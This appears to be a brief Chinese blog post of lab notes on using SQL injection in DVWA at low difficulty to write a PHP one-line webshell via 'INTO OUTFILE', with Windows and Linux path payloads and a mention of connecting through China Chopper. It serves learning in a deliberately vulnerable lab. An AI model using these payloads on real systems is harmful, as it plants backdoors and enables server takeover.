Qing

SQL注入-一句话木马-
'' #一句话木马本体场景:利用phpstudy搭建的DVWA设置DVWA难度等级为low,点击SQL Injec...
扫描右侧二维码阅读全文
14
2019/03

SQL注入-一句话木马-

'' #一句话木马本体

场景:利用phpstudy搭建的DVWA

设置DVWA难度等级为low,点击SQL Injection ,注入一句话木马

1' union select 1,'' into outfile 'C:\\phpstudy\\WWW\\1.php' #
以上就是注入的内容
#关于linux的应该是这个,这个今晚再做,更新下就好
select '' into outfile '/var/www/html/shell.php'

注入完成后,要用菜刀连接,还有其他连接方法,但大部分都是用菜刀的,我学的也是菜刀,

  • pass指的是设定的密码
  • 因为数据库是两个表,所以才是1,select.....
  • 输入路径要注意\\不是平常的斜杠,是反斜杠
  • 输入路径要注意写出文件名,自动会创建的,(.php)
  • 难度等级为low,其他的等级还没试。

最后修改:2019 年 04 月 06 日 02 : 33 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论